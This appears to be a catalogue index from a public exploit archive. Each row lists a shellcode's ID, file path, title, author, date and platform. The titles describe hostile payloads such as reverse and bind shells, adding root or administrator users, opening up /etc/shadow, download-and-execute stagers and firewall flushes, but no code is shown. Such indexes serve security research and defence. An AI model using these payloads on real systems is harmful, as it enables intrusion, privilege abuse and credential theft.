442 18379 shellcodes/linux_x86/18379.c Linux/x86 - Search For '.PHP'/'.HTML' Writable Files + Add Code Shellcode (380+ bytes) 2012-01-17 rigan shellcode linux_x86
443 18585 shellcodes/linux_x86-64/18585.s Linux/x86-64 - Add Root User (t0r/Winner) Shellcode (189 bytes) 2012-03-12 0_o shellcode linux_x86-64
444 18885 shellcodes/linux_x86/18885.c Linux/x86 - execve /bin/dash Shellcode (42 bytes) Linux/x86 - execve(/bin/dash) Shellcode (42 bytes) 2012-05-16 X-h4ck shellcode linux_x86
445 20196 shellcodes/linux_x86/20196.c Linux/x86 - chmod 666 /etc/passwd + /etc/shadow Shellcode (57 bytes) 2012-08-02 Jean Pascal Pereira shellcode linux_x86
446 21252 shellcodes/arm/21252.asm Linux/ARM (Raspberry Pi) - Reverse TCP (10.1.1.2:0x1337/TCP) Shell (/bin/sh) Shellcode (72 bytes) 2012-09-11 midnitesnake shellcode arm
447 21253 shellcodes/arm/21253.asm Linux/ARM (Raspberry Pi) - execve(_/bin/sh__ [0]_ [0 vars]) Shellcode (30 bytes) 2012-09-11 midnitesnake shellcode arm
462 29436 shellcodes/linux_mips/29436.asm Linux/MIPS (Little Endian) - Reverse TCP (192.168.1.177:31337/TCP) Shell (/bin/sh) Shellcode (200 bytes) 2013-11-04 Jacob Holcomb shellcode linux_mips
463 40352 shellcodes/windows_x86/40352.c Windows 7 x86 - Bind TCP (4444/TCP) Shell Shellcode (357 bytes) 2016-09-08 Roziul Hasan Khan Shifat shellcode windows_x86
464 33836 shellcodes/windows/33836.txt Windows - Add Administrator User (BroK3n/BroK3n) Null-Free Shellcode (194 bytes) 2014-06-22 Giuseppe D'Amore shellcode windows
465 34060 shellcodes/linux_x86/34060.c Linux/x86 - execve /bin/sh + Socket Re-Use Shellcode (50 bytes) Linux/x86 - execve(/bin/sh) + Socket Re-Use Shellcode (50 bytes) 2014-07-14 ZadYree shellcode linux_x86
466 34262 shellcodes/linux_x86/34262.c Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add Root User (ALI/ALI) + Execute /bin/sh Shellcode (378 bytes) 2014-08-04 Ali Razmjoo shellcode linux_x86
467 34592 shellcodes/linux_x86/34592.c Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add Root User (ALI/ALI) + setreuid + Execute /bin/bash Obfuscated Shellcode (521 bytes) 2014-09-09 Ali Razmjoo shellcode linux_x86
468 34667 shellcodes/linux_x86-64/34667.c Linux/x86-64 - Reverse TCP (127.1.1.1:6969/TCP) Shell (/bin/bash) Shellcode (139 bytes) 2014-09-15 MadMouse shellcode linux_x86-64
473 35587 shellcodes/linux_x86-64/35587.c Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (Z~r0) + Null-Free + Null-Mask Shellcode (77-85/90-98 bytes) 2014-12-22 Sean Dillon shellcode linux_x86-64
474 35793 shellcodes/windows_x86/35793.txt Windows x86 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + STOP Firewall + Auto Start Terminal Service Obfuscated Shellcode (1218 bytes) 2015-01-13 Ali Razmjoo shellcode windows_x86
475 35794 shellcodes/windows_x86-64/35794.txt Windows x64 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + STOP Firewall + Auto Start Terminal Service Obfuscated Shellcode (1218 bytes) 2015-01-13 Ali Razmjoo shellcode windows_x86-64
476 35868 shellcodes/linux_mips/35868.c Linux/MIPS - execve /bin/sh Shellcode (36 bytes) Linux/MIPS - execve(/bin/sh) Shellcode (36 bytes) 2015-01-22 Sanguine shellcode linux_mips
477 36411 shellcodes/generator/36411.txt Windows XP x86-64 - Download File + Execute Shellcode (Generator) 2015-03-16 Ali Razmjoo shellcode generator
478 36274 shellcodes/linux_mips/36274.c Linux/MIPS (Little Endian) - chmod 666 /etc/shadow Shellcode (55 bytes) 2015-03-05 Sang Min Lee shellcode linux_mips
479 36276 shellcodes/linux_mips/36276.c Linux/MIPS (Little Endian) - chmod 666 /etc/passwd Shellcode (55 bytes) 2015-03-05 Sang Min Lee shellcode linux_mips
480 36359 shellcodes/linux_x86-64/36359.c Linux/x86-64 - Read /etc/passwd + Write To /tmp/outfile Shellcode (118 bytes) 2014-03-27 Chris Higgins shellcode linux_x86-64
481 36391 shellcodes/linux_x86/36391.c Linux/x86 - execve /bin/sh ROT13 Encoded Shellcode (68 bytes) Linux/x86 - execve(/bin/sh) ROT13 Encoded Shellcode (68 bytes) 2015-03-16 Maximiliano Gomez Vidal shellcode linux_x86
482 36393 shellcodes/linux_x86/36393.c Linux/x86 - chmod 0777 /etc/shadow Obfuscated Shellcode (84 bytes) 2015-03-16 Maximiliano Gomez Vidal shellcode linux_x86
483 36394 shellcodes/linux_x86/36394.c Linux/x86 - Add Map (127.1.1.1 google.com) In /etc/hosts Obfuscated Shellcode (98 bytes) 2015-03-16 Maximiliano Gomez Vidal shellcode linux_x86
484 36395 shellcodes/linux_x86/36395.c Linux/x86 - execve /bin/sh Obfuscated Shellcode (40 bytes) Linux/x86 - execve(/bin/sh) Obfuscated Shellcode (40 bytes) 2015-03-16 Maximiliano Gomez Vidal shellcode linux_x86
485 36397 shellcodes/linux_x86/36397.c Linux/x86 - Reverse TCP (192.168.1.133:33333/TCP) Shell (/bin/sh) Shellcode (72 bytes) 2015-03-16 Maximiliano Gomez Vidal shellcode linux_x86
486 36398 shellcodes/linux_x86/36398.c Linux/x86 - Bind TCP (33333/TCP) Shell (/bin/sh) Shellcode (96 bytes) 2015-03-16 Maximiliano Gomez Vidal shellcode linux_x86
487 36637 shellcodes/linux_x86/36637.c Linux/x86 - Disable ASLR Security Shellcode (84 bytes) 2015-04-03 Mohammad Reza Ramezani shellcode linux_x86
489 36673 shellcodes/generator/36673.py Linux/x86 - Typewriter Shellcode (Generator) 2015-04-08 Paw Petersen shellcode generator
490 36701 shellcodes/linux_x86/36701.c Linux/x86 - Create _my.txt_ In Working Directory Shellcode (37 bytes) 2015-04-10 Mohammad Reza Ramezani shellcode linux_x86
491 36750 shellcodes/linux_x86/36750.c Linux/x86 - setreuid(0_ 0) + execve(_/sbin/halt_) + exit(0) Shellcode (49 bytes) 2015-04-14 Febriyanto Nugroho shellcode linux_x86
492 36778 shellcodes/linux_x86/36778.c Linux/x86 - execve /bin/sh Shellcode (35 bytes) Linux/x86 - execve(/bin/sh) Shellcode (35 bytes) 2015-04-17 Mohammad Reza Espargham shellcode linux_x86
493 36779 shellcodes/windows_x86/36779.c Windows XP SP3 x86 - Create (_file.txt_) Shellcode (83 bytes) 2015-04-17 TUNISIAN CYBER shellcode windows_x86
494 36780 shellcodes/windows_x86/36780.c Windows XP SP3 x86 - Restart Shellcode (57 bytes) 2015-04-17 TUNISIAN CYBER shellcode windows_x86
495 36781 shellcodes/generator/36781.py Linux/x86 - Custom execve Shellcode (Encoder/Decoder) (Generator) Linux/x86 - 'Followtheleader' Custom execve() Shellcode (Encoder/Decoder) (Generator) 2015-04-17 Konstantinos Alexiou shellcode generator
496 36857 shellcodes/linux_x86/36857.c Linux/x86 - execve /bin/sh (Push Method) Shellcode (21 bytes) Linux/x86 - execve(/bin/sh) (Push Method) Shellcode (21 bytes) 2015-04-29 noviceflux shellcode linux_x86
497 36858 shellcodes/linux_x86-64/36858.c Linux/x86-64 - execve /bin/sh Via Push Shellcode (23 bytes) Linux/x86-64 - execve(/bin/sh) Via Push Shellcode (23 bytes) 2015-04-29 noviceflux shellcode linux_x86-64
498 36921 shellcodes/linux_x86/36921.c Linux/x86 - Bind TCP (17771/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (58 bytes) 2015-05-06 Oleg Boytsev shellcode linux_x86
499 36908 shellcodes/linux_x86/36908.c Linux/x86 - exit(0) Shellcode (6 bytes) 2015-05-04 Febriyanto Nugroho shellcode linux_x86
500 37069 shellcodes/linux_x86/37069.c Linux/x86 - execve /bin/sh Shellcode (26 bytes) Linux/x86 - execve(/bin/sh) Shellcode (26 bytes) 2015-05-20 Reza Behzadpour shellcode linux_x86
501 37251 shellcodes/linux_x86/37251.asm Linux/x86 - execve /bin/sh Shellcode (21 bytes) (1) Linux/x86 - execve(/bin/sh) Shellcode (21 bytes) (1) 2015-06-10 B3mB4m shellcode linux_x86
502 37285 shellcodes/linux_x86/37285.txt Linux/x86 - chmod 777 /etc/shadow + exit() Shellcode (33 bytes) 2015-06-15 B3mB4m shellcode linux_x86
503 37289 shellcodes/linux_x86/37289.txt Linux/x86 - Shutdown(init 0) Shellcode (30 bytes) 2015-06-15 B3mB4m shellcode linux_x86
504 37297 shellcodes/linux_x86/37297.txt Linux/x86 - Read /etc/passwd Shellcode (58 bytes) 2015-06-16 B3mB4m shellcode linux_x86
505 37358 shellcodes/linux_x86/37358.c Linux/x86 - mkdir HACK + chmod 777 + exit(0) Shellcode (29 bytes) 2015-06-24 B3mB4m shellcode linux_x86
506 37359 shellcodes/linux_x86/37359.c Linux/x86 - Bind TCP (5555/TCP) Netcat Shell Shellcode (60 bytes) 2015-06-24 B3mB4m shellcode linux_x86
507 37362 shellcodes/linux_x86-64/37362.c Linux/x86-64 - execve /bin/sh Null-Free Shellcode (30 bytes) Linux/x86-64 - execve(/bin/sh) Null-Free Shellcode (30 bytes) 2015-06-24 Bill Borskey shellcode linux_x86-64
508 37365 shellcodes/linux_x86/37365.c Linux/x86 - Download File + Execute Shellcode 2015-06-24 B3mB4m shellcode linux_x86
509 37366 shellcodes/linux_x86/37366.c Linux/x86 - Reboot Shellcode (28 bytes) 2015-06-24 B3mB4m shellcode linux_x86
510 37384 shellcodes/linux_x86/37384.c Linux/x86 - execve /bin/sh Shellcode (23 bytes) Linux/x86 - execve(/bin/sh) Shellcode (23 bytes) 2015-06-26 Bill Borskey shellcode linux_x86
511 37390 shellcodes/linux_x86/37390.asm Linux/x86 - chmod 0777 /etc/passwd Shellcode (42 bytes) 2015-06-26 Mohammad Reza Espargham shellcode linux_x86
512 37391 shellcodes/linux_x86/37391.asm Linux/x86 - chmod /etc/gshadow Shellcode (37 bytes) 2015-06-26 Mohammad Reza Espargham shellcode linux_x86
513 37392 shellcodes/linux_x86/37392.asm Linux/x86 - chmod 0777 /etc/shadow Shellcode (42 bytes) 2015-06-26 Mohammad Reza Espargham shellcode linux_x86
514 37393 shellcodes/linux_x86/37393.asm Linux/x86 - exec /bin/dash Shellcode (45 bytes) 2015-06-26 Mohammad Reza Espargham shellcode linux_x86
515 37401 shellcodes/linux_x86-64/37401.asm Linux/x86-64 - execve Encoded Shellcode (57 bytes) Linux/x86-64 - execve() Encoded Shellcode (57 bytes) 2015-06-27 Bill Borskey shellcode linux_x86-64
516 37495 shellcodes/linux_x86/37495.py Linux/x86 - execve /bin/sh ROT7 Encoded Shellcode Linux/x86 - execve(/bin/sh) ROT7 Encoded Shellcode 2015-07-05 Artem T shellcode linux_x86
517 37664 shellcodes/windows_x86/37664.c Windows XP SP3 x86 (Turkish) - MessageBox Shellcode (24 bytes) 2015-07-21 B3mB4m shellcode windows_x86
518 37749 shellcodes/linux_x86/37749.c Linux/x86 - Egghunter Shellcode (19 bytes) 2015-08-10 Guillaume Kaddouch shellcode linux_x86
519 37758 shellcodes/windows_x86/37758.c Windows x86 - user32!MessageBox _Hello World!_ Null-Free Shellcode (199 bytes) 2015-08-12 noviceflux shellcode windows_x86
520 37762 shellcodes/linux_x86/37762.py Linux/x86 - execve /bin/sh ROL/ROR Encoded Shellcode Linux/x86 - execve(/bin/sh) ROL/ROR Encoded Shellcode 2015-08-12 Anastasios Monachos shellcode linux_x86
521 37895 shellcodes/windows_x86-64/37895.asm Windows 2003 x64 - Token Stealing Shellcode (59 bytes) 2015-08-20 Fitzl Csaba shellcode windows_x86-64
522 38065 shellcodes/osx/38065.txt OSX/x86-64 - execve /bin/sh Null-Free Shellcode (34 bytes) OSX/x86-64 - execve(/bin/sh) Null-Free Shellcode (34 bytes) 2015-09-02 Fitzl Csaba shellcode osx
523 38075 shellcodes/system_z/38075.txt Mainframe/System Z - Bind TCP (12345/TCP) Shell + Null-Free Shellcode (2488 bytes) 2015-09-02 Bigendian Smalls shellcode system_z
524 38088 shellcodes/linux_x86/38088.c Linux/x86 - execve /bin/bash Shellcode (31 bytes) Linux/x86 - execve(/bin/bash) Shellcode (31 bytes) 2015-09-06 Ajith Kp shellcode linux_x86
525 38094 shellcodes/generator/38094.c Linux/x86 - Create File With Permission 7775 + exit Shellcode (Generator) 2015-09-07 Ajith Kp shellcode generator
526 38116 shellcodes/linux_x86/38116.c Linux/x86 - execve(_/bin/cat__ [_/bin/cat__ _/etc/passwd_]_ NULL) Shellcode (75 bytes) 2015-09-09 Ajith Kp shellcode linux_x86
527 38126 shellcodes/osx/38126.c OSX/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (144 bytes) 2015-09-10 Fitzl Csaba shellcode osx
528 38150 shellcodes/linux_x86-64/38150.txt Linux/x86-64 - execve /bin/sh Shellcode (34 bytes) Linux/x86-64 - execve(/bin/sh) Shellcode (34 bytes) 2015-09-11 Fanda Uchytil shellcode linux_x86-64
529 38194 shellcodes/android/38194.c Google Android - Bind TCP (1035/TCP) Telnetd Shell + Environment/Parameters Shellcode (248 bytes) 2015-09-15 Steven Padilla shellcode android
530 38239 shellcodes/linux_x86-64/38239.asm Linux/x86-64 - execve Shellcode (22 bytes) Linux/x86-64 - execve() Shellcode (22 bytes) 2015-09-18 d4sh&r shellcode linux_x86-64
531 38469 shellcodes/linux_x86-64/38469.c Linux/x86-64 - Bind TCP (31173/TCP) Shell (/bin/sh) + Password (1234) Shellcode (92 bytes) 2015-10-15 d4sh&r shellcode linux_x86-64
532 38708 shellcodes/linux_x86-64/38708.asm Linux/x86-64 - Egghunter Shellcode (24 bytes) 2015-11-16 d4sh&r shellcode linux_x86-64
533 38815 shellcodes/linux_x86-64/38815.c Linux/x86-64 - execve Polymorphic Shellcode (31 bytes) Linux/x86-64 - execve() + Polymorphic Shellcode (31 bytes) 2015-11-25 d4sh&r shellcode linux_x86-64
534 38959 shellcodes/generator/38959.py Windows XP < 10 - Command Generator WinExec Null-Free Shellcode (Generator) 2015-12-13 B3mB4m shellcode generator
535 39149 shellcodes/linux_x86-64/39149.c Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (103 bytes) 2016-01-01 Scorpion_ shellcode linux_x86-64
536 39152 shellcodes/linux_x86-64/39152.c Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (hack) + Null-Free Shellcode (162 bytes) 2016-01-02 Sathish kumar shellcode linux_x86-64
537 39160 shellcodes/linux_x86/39160.c Linux/x86 - execve /bin/sh Shellcode (24 bytes) (1) Linux/x86 - execve(/bin/sh) Shellcode (24 bytes) (1) 2016-01-04 Dennis 'dhn' Herrmann shellcode linux_x86
538 39185 shellcodes/linux_x86-64/39185.c Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hack) + Null-Free Shellcode (151 bytes) 2016-01-06 Sathish kumar shellcode linux_x86-64
539 39203 shellcodes/linux_x86-64/39203.c Linux/x86-64 - Egghunter Shellcode (18 bytes) 2016-01-08 Sathish kumar shellcode linux_x86-64
540 39204 shellcodes/linux_x86/39204.c Linux/x86 - Egghunter Shellcode (13 bytes) 2016-01-08 Dennis 'dhn' Herrmann shellcode linux_x86
541 39312 shellcodes/linux_x86-64/39312.c Linux/x86-64 - execve XOR/NOT/DIV Encoded Shellcode (54 bytes) Linux/x86-64 - execve() XOR/NOT/DIV Encoded Shellcode (54 bytes) 2016-01-25 Sathish kumar shellcode linux_x86-64
542 39336 shellcodes/linux/39336.c Linux x86/x86-64 - Reverse TCP (192.168.1.29:4444/TCP) Shell Shellcode (195 bytes) 2016-01-27 B3mB4m shellcode linux
543 39337 shellcodes/linux/39337.c Linux x86/x86-64 - Bind TCP (4444/TCP) Shell Shellcode (251 bytes) 2016-01-27 B3mB4m shellcode linux
544 39338 shellcodes/linux/39338.c Linux x86/x86-64 - Read /etc/passwd Shellcode (156 bytes) 2016-01-27 B3mB4m shellcode linux
545 39383 shellcodes/linux_x86-64/39383.c Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hack) + Polymorphic Shellcode (122 bytes) 2016-01-29 Sathish kumar shellcode linux_x86-64
546 39388 shellcodes/linux_x86-64/39388.c Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell + Password (hack) + Polymorphic Shellcode (135 bytes) 2016-02-01 Sathish kumar shellcode linux_x86-64
547 39389 shellcodes/linux_x86/39389.c Linux/x86 - Download File + Execute Shellcode (135 bytes) 2016-02-01 B3mB4m shellcode linux_x86
548 39390 shellcodes/linux_x86-64/39390.c Linux/x86-64 - execve Stack Polymorphic Shellcode (47 bytes) Linux/x86-64 - execve() Stack + Polymorphic Shellcode (47 bytes) 2016-02-01 Sathish kumar shellcode linux_x86-64
549 39496 shellcodes/arm/39496.c Linux/ARM - Reverse TCP (10.0.0.10:1337/TCP) Shell (/bin/sh) Shellcode (95 bytes) 2016-02-26 Xeon shellcode arm
550 39519 shellcodes/windows_x86/39519.c Windows x86 - Download File + Run via WebDAV (//192.168.1.19/c) Null-Free Shellcode (96 bytes) 2016-03-02 Sean Dillon shellcode windows_x86
551 39578 shellcodes/linux_x86-64/39578.c Linux/x86-64 - Reverse TCP (192.168.1.2:1234/TCP) Shell Shellcode (134 bytes) 2016-03-21 Sudhanshu Chauhan shellcode linux_x86-64
552 39617 shellcodes/linux_x86-64/39617.c Linux/x86-64 - execve /bin/sh Shellcode (26 bytes) Linux/x86-64 - execve(/bin/sh) Shellcode (26 bytes) 2016-03-24 Ajith Kp shellcode linux_x86-64
553 39624 shellcodes/linux_x86-64/39624.c Linux/x86-64 - execve /bin/sh Shellcode (25 bytes) (1) Linux/x86-64 - execve(/bin/sh) Shellcode (25 bytes) (1) 2016-03-28 Ajith Kp shellcode linux_x86-64
554 39625 shellcodes/linux_x86-64/39625.c Linux/x86-64 - execve /bin/bash Shellcode (33 bytes) Linux/x86-64 - execve(/bin/bash) Shellcode (33 bytes) 2016-03-28 Ajith Kp shellcode linux_x86-64
555 39684 shellcodes/linux_x86-64/39684.c Linux/x86-64 - Bind TCP (5600/TCP) Shell Shellcode (81 bytes) 2016-04-11 Ajith Kp shellcode linux_x86-64
556 39700 shellcodes/linux_x86-64/39700.c Linux/x86-64 - Read /etc/passwd Shellcode (65 bytes) 2016-04-15 Ajith Kp shellcode linux_x86-64
557 39718 shellcodes/linux_x86-64/39718.c Linux/x86-64 - Bind TCP (5600/TCP) Shell Shellcode (86 bytes) 2016-04-21 Ajith Kp shellcode linux_x86-64
567 39815 shellcodes/generator/39815.c Linux/x86 - Bind TCP (1234/TCP) Shell (/bin/sh) Shellcode (87 bytes) (Generator) 2016-05-16 JollyFrogs shellcode generator
568 39847 shellcodes/linux_x86-64/39847.c Linux/x86-64 - Download File (http://192.168.30.129/pri.sh) + Execute Used To Steal Information Shellcode (399 bytes) 2016-05-23 Roziul Hasan Khan Shifat shellcode linux_x86-64
569 39851 shellcodes/linux_x86/39851.c Linux/x86 - Bind TCP (4444/TCP) Shell (/bin/bash) Shellcode (656 bytes) 2016-05-25 Brandon Dennis shellcode linux_x86
570 39869 shellcodes/linux_x86-64/39869.c Linux/x86-64 - execve XOR Encoded Shellcode (84 bytes) Linux/x86-64 - execve() XOR Encoded Shellcode (84 bytes) 2016-05-30 Roziul Hasan Khan Shifat shellcode linux_x86-64
571 39885 shellcodes/multiple/39885.c BSD / Linux / Windows x86/x86-64 - execve(_/bin//sh__ {_//bin/sh__ _-c__ _cmd_}_ NULL) Execute Command Shellcode (194 bytes) 2016-06-06 odzhancode shellcode multiple
572 39900 shellcodes/windows_x86/39900.c Windows x86 - WinExec(_cmd.exe__0) Shellcode (184 bytes) 2016-06-07 Roziul Hasan Khan Shifat shellcode windows_x86
573 39901 shellcodes/linux_x86/39901.c Linux/x86 - Bind TCP (13337/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (56 bytes) 2016-06-07 sajith shellcode linux_x86
574 39914 shellcodes/windows_x86/39914.c Windows x86 - system(_systeminfo_) Shellcode (224 bytes) 2016-06-10 Roziul Hasan Khan Shifat shellcode windows_x86
575 39979 shellcodes/windows/39979.c Windows XP < 10 - Download File + Execute Shellcode 2016-06-20 B3mB4m shellcode windows
576 40005 shellcodes/windows_x86/40005.c Windows x86 - ShellExecuteA(NULL_NULL__cmd.exe__NULL_NULL_1) Shellcode (250 bytes) 2016-06-22 Roziul Hasan Khan Shifat shellcode windows_x86
577 40026 shellcodes/linux_x86/40026.txt Linux/x86 - execve /bin/sh + ASLR Bruteforce Shellcode Linux/x86 - execve(/bin/sh) + ASLR Bruteforce Shellcode 2016-06-27 Pawan Lal shellcode linux_x86
578 40029 shellcodes/linux_x86-64/40029.c Linux/x86-64 - Reverse TCP (192.168.86.128:1472/TCP) cat /etc/passwd Shellcode (164 bytes) 2016-06-28 Roziul Hasan Khan Shifat shellcode linux_x86-64
579 40052 shellcodes/linux_x86-64/40052.c Linux/x86-64 - Bind TCP Netcat Shell + Null-Free Shellcode (64 bytes) 2016-07-04 Kyzer shellcode linux_x86-64
580 40056 shellcodes/linux_x86/40056.c Linux/x86 - Bind TCP (4444/TCP) Shell (/bin/sh) Shellcode (98 bytes) 2016-07-04 sajith shellcode linux_x86
584 40110 shellcodes/linux_x86/40110.c Linux/x86 - Reverse Xterm Shell (127.1.1.1:10) Shellcode (68 bytes) 2016-07-13 RTV shellcode linux_x86
585 40122 shellcodes/linux_x86-64/40122.txt Linux/x86-64 - Bind TCP (4442/TCP) Shell + Syscall Persistent + Multi-Terminal/Port-Range (4444-4447/TCP) + Password (la crips) + Daemon Shellcode (83/148/177 bytes) 2016-07-19 Kyzer shellcode linux_x86-64
586 40128 shellcodes/linux_crisv32/40128.c Linux/CRISv32 Axis Communication - Reverse TCP (192.168.57.1:443/TCP) Shell (/bin/sh) Shellcode (189 bytes) 2016-07-20 bashis shellcode linux_crisv32
587 40131 shellcodes/linux_x86/40131.c Linux/x86 - execve /bin/sh Shellcode (19 bytes) Linux/x86 - execve(/bin/sh) Shellcode (19 bytes) 2016-07-20 sajith shellcode linux_x86
588 40139 shellcodes/linux_x86-64/40139.c Linux/x86-64 - Reverse TCP (10.1.1.4:46357/TCP) Shell + Subtle Probing + Timer + Burst + Password (la crips) + Multi-Terminal Shellcode (84/122/172 bytes) 2016-07-21 Kyzer shellcode linux_x86-64
589 40175 shellcodes/windows_x86/40175.c Windows 7 x86 - localhost Port Scanner Shellcode (556 bytes) 2016-07-29 Roziul Hasan Khan Shifat shellcode windows_x86
590 40179 shellcodes/linux_x86/40179.c Linux/x86 - Bind Netcat Shell (98/TCP + UDP) Shellcode (44/52 bytes) 2016-07-29 Kyzer shellcode linux_x86
611 43606 shellcodes/linux_x86-64/43606.c Linux/x86-64 - setreuid(0_0) + execve(/bin/zsh_ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (87 bytes) 2009-01-01 egeektronic shellcode linux_x86-64
612 43607 shellcodes/linux_x86-64/43607.c Linux/x86-64 - sethostname(Rooted !) + killall Shellcode (33 bytes) 2009-01-01 zbt shellcode linux_x86-64
613 43608 shellcodes/openbsd_x86/43608.c OpenBSD/x86 - reboot() Shellcode (15 bytes) 2009-01-01 beosroot shellcode openbsd_x86
614 43610 shellcodes/osx_ppc/43610.c OSX/PPC - Remote findsock by recv() Key Shellcode 2009-01-01 Dino Dai Zovi shellcode osx_ppc
615 43611 shellcodes/osx_ppc/43611.asm OSX/PPC - Reverse TCP Shell (/bin/csh) Shellcode 2009-01-01 H D Moore shellcode osx_ppc
616 43612 shellcodes/osx_ppc/43612.asm OSX/PPC - Stager Sock Find MSG_PEEK Shellcode 2009-01-01 H D Moore shellcode osx_ppc
617 43613 shellcodes/osx_ppc/43613.asm OSX/PPC - Stager Sock Find Shellcode 2009-01-01 H D Moore shellcode osx_ppc
618 43614 shellcodes/osx_ppc/43614.asm OSX/PPC - Stager Sock Reverse Shellcode 2009-01-01 H D Moore shellcode osx_ppc
619 43615 shellcodes/osx_ppc/43615.c OSX/PPC - Bind TCP (8000/TCP) Shell + OSXPPCLongXOR Encoded Shellcode (300 bytes) 2009-01-01 H D Moore shellcode osx_ppc
620 43616 shellcodes/osx_ppc/43616.asm OSX/PPC - execve(/bin/sh) Shellcode 2009-01-01 ghandi shellcode osx_ppc
621 43617 shellcodes/osx_ppc/43617.c OSX/PPC - execve(/bin/sh_[/bin/sh]_NULL) + exit() Shellcode (72 bytes) 2009-01-01 haphet shellcode osx_ppc
622 43618 shellcodes/osx/43618.c OSX/x86 - execve(/bin/sh) Shellcode (24 bytes) 2009-01-01 haphet shellcode osx
623 43626 shellcodes/linux_x86/43626.c Linux/x86 - Add User (t00r/t00r) PexFnstenvSub Encoded Shellcode (116 bytes) 2009-01-01 vlad902 shellcode linux_x86
624 43627 shellcodes/bsd_x86/43627.c BSD/x86 - setuid(0) + Break chroot (../ 10x Loop) + execute /bin/sh Shellcode (57 bytes) 2009-01-01 dev0id shellcode bsd_x86
625 43628 shellcodes/bsd_x86/43628.c BSD/x86 - setuid(0) + Break chroot (../ 10x Loop) + Bind TCP (2222/TCP) Shell Shellcode (133 bytes) 2009-01-01 dev0id shellcode bsd_x86
626 43629 shellcodes/bsd_x86/43629.c BSD/x86 - Bind TCP (2222/TCP) Shell Shellcode (100 bytes) 2009-01-01 dev0id shellcode bsd_x86
627 43630 shellcodes/linux_x86/43630.c Linux/x86 - setuid(0) + Load Kernel Module (/tmp/o.o) Shellcode (67 bytes) 2009-01-01 dev0id shellcode linux_x86
628 43631 shellcodes/linux_x86/43631.c Linux/x86 - setuid(0) + Break chroot (../ 10x Loop) Shellcode (34 bytes) 2009-01-01 dev0id shellcode linux_x86
629 43621 shellcodes/solaris_sparc/43621.c Solaris/SPARC - setreuid(geteuid()) + setregid(getegid()) + execve(/bin/sh) Shellcode 2009-01-01 Claes M. Nyberg shellcode solaris_sparc
630 43622 shellcodes/solaris_sparc/43622.asm Solaris/SPARC - Bind TCP (2001/TCP) Shell (/bin/sh) Shellcode 2009-01-01 ghandi shellcode solaris_sparc
631 43623 shellcodes/solaris_sparc/43623.asm Solaris/SPARC - Bind TCP Shell Shellcode 2009-01-01 vlad902 shellcode solaris_sparc
632 43624 shellcodes/solaris_x86/43624.asm Solaris/x86 - setuid(0) + /bin/cat /etc/shadow Shellcode (61 bytes) 2009-01-01 John Babio shellcode solaris_x86
633 43625 shellcodes/solaris_x86/43625.c Solaris/x86 - execve(/bin/sh) Shellcode (43 bytes) 2009-01-01 shellcode.com.ar shellcode solaris_x86
634 43632 shellcodes/bsd_x86/43632.c BSD/x86 - setuid(0) + Break chroot (../ 10x Loop) Shellcode (34 bytes) 2009-01-01 dev0id shellcode bsd_x86
635 43634 shellcodes/openbsd_x86/43634.c OpenBSD/x86 - setuid(0) + Load Kernel Module (/tmp/o.o) Shellcode (74 bytes) 2009-01-01 dev0id shellcode openbsd_x86
636 43635 shellcodes/bsd_x86/43635.c BSD/x86 - Break chroot (../ 10x Loop) Shellcode (28 bytes) 2009-01-01 dev0id shellcode bsd_x86
637 43636 shellcodes/bsd_x86/43636.c BSD/x86 - Break chroot (../ 10x Loop) Shellcode (40 bytes) 2009-01-01 dev0id shellcode bsd_x86
638 43637 shellcodes/linux_x86/43637.c Linux/x86 - Flush IPTables Rules (/sbin/iptables -F) + exit() Shellcode (58 bytes) 2009-01-01 dev0id shellcode linux_x86
639 43638 shellcodes/linux_x86/43638.c Linux/x86 - Flush IPChains Rules (/sbin/ipchains -F) + exit() Shellcode (64 bytes) 2009-01-01 dev0id shellcode linux_x86
640 43639 shellcodes/linux_x86/43639.c Linux/x86 - Flush IPChains Rules (/sbin/ipchains -F) Shellcode (58 bytes) 2009-01-01 dev0id shellcode linux_x86
641 43640 shellcodes/bsd_x86/43640.c BSD/x86 - symlink /bin/sh sh Shellcode (39 bytes) 2009-01-01 dev0id shellcode bsd_x86
642 43641 shellcodes/linux_x86/43641.c Linux/x86 - symlink /bin/sh sh Shellcode (36 bytes) 2009-01-01 dev0id shellcode linux_x86
643 43642 shellcodes/bsd_x86/43642.c BSD/x86 - Write to /etc/passwd with uid(0) + gid(0) Shellcode (74 bytes) 2009-01-01 dev0id shellcode bsd_x86
644 43643 shellcodes/linux_x86/43643.c Linux/x86 - Write to /etc/passwd with uid(0) + gid(0) Shellcode (74 bytes) 2009-01-01 dev0id shellcode linux_x86
645 43644 shellcodes/bsd_x86/43644.asm BSD/x86 - execve(/bin/sh) + seteuid(0) Shellcode (31 bytes) 2009-01-01 dev0id shellcode bsd_x86
646 43645 shellcodes/bsd_x86/43645.asm BSD/x86 - execve(/bin/sh) Shellcode (28 bytes) 2009-01-01 dev0id shellcode bsd_x86
647 43646 shellcodes/linux_x86/43646.c Linux/x86 - Bind TCP (3879/TCP) Shell (/bin/sh) Shellcode (113 bytes) 2009-01-01 lamagra shellcode linux_x86
648 43647 shellcodes/linux_x86/43647.c Linux/x86 - Add Root User (w00w00) To /etc/passwd Shellcode (104 bytes) 2009-01-01 Shok shellcode linux_x86
649 43648 shellcodes/linux_x86/43648.c Linux/x86 - Disable Shadowing Shellcode (42 bytes) 2009-07-04 vlan7 shellcode linux_x86
650 43649 shellcodes/linux_x86/43649.c Linux/x86 - setuid(0) + execve(/bin/sh) Shellcode (27 bytes) 2009-07-04 vlan7 shellcode linux_x86
651 43650 shellcodes/linux_x86/43650.c Linux/x86 - exit(0) / exit(1) Shellcode (3/4 bytes) 2009-06-18 TheWorm shellcode linux_x86
